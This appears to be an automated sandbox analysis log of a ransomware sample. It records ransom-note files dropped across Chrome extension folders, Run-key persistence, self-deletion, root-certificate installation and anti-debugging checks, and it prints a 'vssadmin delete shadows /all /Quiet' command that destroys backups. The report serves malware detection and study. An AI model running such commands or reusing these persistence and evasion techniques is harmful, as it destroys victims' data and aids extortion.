Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\sr\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\sv\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\sv\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\th\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\th\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\tr\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\tr\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\uk\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\uk\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\vi\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\vi\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\zh_CN\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\zh_CN\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\zh_TW\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\zh_TW\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_metadata\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_metadata\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\af\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\af\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\am\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\am\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\ar\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\ar\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\az\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\az\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\be\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\be\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\bg\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\bg\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\bn\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\bn\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\ca\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\ca\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\cs\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\cs\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\cy\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\cy\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\da\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\da\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\de\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\de\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\el\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\el\restore_files_gpmus.htmlJump to behavior

Boot Survival

barindex
Creates autostart registry keys with suspicious names
Source: C:\Users\user\AppData\Roaming\svcmtr.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run E722D94C1CAC34BJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run E722D94C1CAC34BJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run E722D94C1CAC34BJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run E722D94C1CAC34BJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run E722D94C1CAC34BJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Creates files in the recycle bin to hide itself
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\$Recycle.Bin\S-1-5-21-966771315-3019405637-367336477-1001\restore_files_gpmus.txtJump to behavior
Deletes itself after installation
Source: C:\Users\user\Desktop\0t8amSU3vd.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c del C:\Users\user\Desktop\0T8AMS~1.EXE >> NUL
Source: C:\Users\user\Desktop\0t8amSU3vd.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c del C:\Users\user\Desktop\0T8AMS~1.EXE >> NULJump to behavior
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\Desktop\0t8amSU3vd.exeFile opened: C:\Users\user\Desktop\0t8amSU3vd.exe:Zone.Identifier read attributes | deleteJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Users\user\AppData\Roaming\svcmtr.exe:Zone.Identifier read attributes | deleteJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Users\user\AppData\Roaming\svcmtr.exe:Zone.Identifier read attributes | deleteJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Users\user\AppData\Roaming\svcmtr.exe:Zone.Identifier read attributes | delete
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Users\user\AppData\Roaming\svcmtr.exe:Zone.Identifier read attributes | delete
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_0041B2C0 GetVersionExW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,0_2_0041B2C0
Source: C:\Users\user\AppData\Roaming\svcmtr.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Users\user\Desktop\0t8amSU3vd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\0t8amSU3vd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\0t8amSU3vd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\0t8amSU3vd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\0t8amSU3vd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\0t8amSU3vd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\0t8amSU3vd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\0t8amSU3vd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 2_2_0041B2C0 GetVersionExW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,GetTickCount,GetTickCount,Heap32ListFirst,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,Process32First,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,2_2_0041B2C0
Source: C:\Users\user\AppData\Roaming\svcmtr.exeWindow / User API: threadDelayed 5444Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeWindow / User API: threadDelayed 3233Jump to behavior
Source: C:\Users\user\Desktop\0t8amSU3vd.exeEvaded block: after key decisiongraph_0-22035
Source: C:\Users\user\AppData\Roaming\svcmtr.exeEvaded block: after key decisiongraph_2-22320
Source: C:\Users\user\Desktop\0t8amSU3vd.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_0-22377
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_2-22173
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-22168
Source: C:\Users\user\Desktop\0t8amSU3vd.exe TID: 3528Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exe TID: 3596Thread sleep count: 5444 > 30Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exe TID: 3596Thread sleep time: -1088800s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exe TID: 3620Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exe TID: 3596Thread sleep count: 3233 > 30Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exe TID: 3596Thread sleep time: -646600s >= -30000sJump to behavior
Source: C:\Windows\System32\vssadmin.exe TID: 3720Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\System32\vssadmin.exe TID: 3720Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_004139B0 _memset,_memset,FindFirstFileW,__wcsdup,wcsstr,wcsstr,wcsstr,wcsstr,_free,FindNextFileW,FindClose,0_2_004139B0
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 2_2_004139B0 _memset,_memset,FindFirstFileW,__wcsdup,wcsstr,wcsstr,wcsstr,wcsstr,_free,FindNextFileW,FindClose,2_2_004139B0
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_00413780 GetLogicalDriveStringsW,_memset,GetVolumeInformationW,GetDriveTypeW,GetVolumeInformationW,ExitThread,0_2_00413780
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\AppCache\V607KDWC\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Outlook\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\PlayReady\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\PlayReady\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\1033\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\1033\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\Desktop\0t8amSU3vd.exeAPI call chain: ExitProcess graph end nodegraph_0-22002
Source: C:\Users\user\AppData\Roaming\svcmtr.exeAPI call chain: ExitProcess graph end nodegraph_2-22097
Source: C:\Users\user\AppData\Roaming\svcmtr.exeAPI call chain: ExitProcess graph end nodegraph_2-21940
Source: C:\Users\user\AppData\Roaming\svcmtr.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_004258E7 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004258E7
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 2_2_0041B2C0 GetVersionExW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,GetTickCount,GetTickCount,Heap32ListFirst,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,Process32First,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,2_2_0041B2C0
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_0042CCB4 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_0042CCB4
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_00413D10 wcsstr,_memset,GetFileAttributesW,SetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,CloseHandle,_memset,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,CloseHandle,SetFilePointer,WriteFile,WriteFile,GetProcessHeap,HeapFree,HeapFree,WriteFile,WriteFile,GetProcessHeap,HeapFree,HeapFree,FlushFileBuffers,CloseHandle,MoveFileExW,GetLastError,DeleteFileW,Sleep,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,0_2_00413D10
Source: C:\Users\user\Desktop\0t8amSU3vd.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\svcmtr.exeProcess token adjusted: Debug
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_004258E7 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004258E7
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_0042A9AE SetUnhandledExceptionFilter,0_2_0042A9AE
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_00423EBB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00423EBB
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 2_2_004258E7 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_004258E7
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 2_2_0042A9AE SetUnhandledExceptionFilter,2_2_0042A9AE
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 2_2_00423EBB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00423EBB
Source: C:\Users\user\Desktop\0t8amSU3vd.exeProcess created: C:\Users\user\AppData\Roaming\svcmtr.exe C:\Users\user\AppData\Roaming\svcmtr.exeJump to behavior
Source: C:\Users\user\Desktop\0t8amSU3vd.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c del C:\Users\user\Desktop\0T8AMS~1.EXE >> NULJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeProcess created: C:\Windows\System32\vssadmin.exe "C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet Jump to behavior
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_0041D4D0 LoadStringW,LoadStringW,LoadStringW,CoInitializeEx,AllocateAndInitializeSid,CheckTokenMembership,FreeSid,SHGetFolderPathW,SHGetFolderPathW,CoCreateInstance,CoCreateInstance,CoCreateInstance,ExitProcess,_memset,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetSpecialFolderPathW,SHGetFolderPathW,SHGetFolderPathW,GetModuleFileNameW,DeleteFileW,LookupPrivilegeValueA,CreateMutexW,GetLastError,_memset,GetVersionExW,CreateThread,CreateThread,_memset,__wfopen_s,_fprintf,CreateThread,CreateThread,CreateThread,SetThreadPriority,WaitForSingleObject,WaitForSingleObject,_memset,ShellExecuteW,ShellExecuteW,ShellExecuteW,ShellExecuteW,CreateThread,WaitForSingleObject,CreateThread,WaitForSingleObject,0_2_0041D4D0
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_003B17FB cpuid 0_2_003B17FB
Source: C:\Users\user\AppData\Roaming\svcmtr.exeQueries volume information: C:\ VolumeInformationJump to behavior
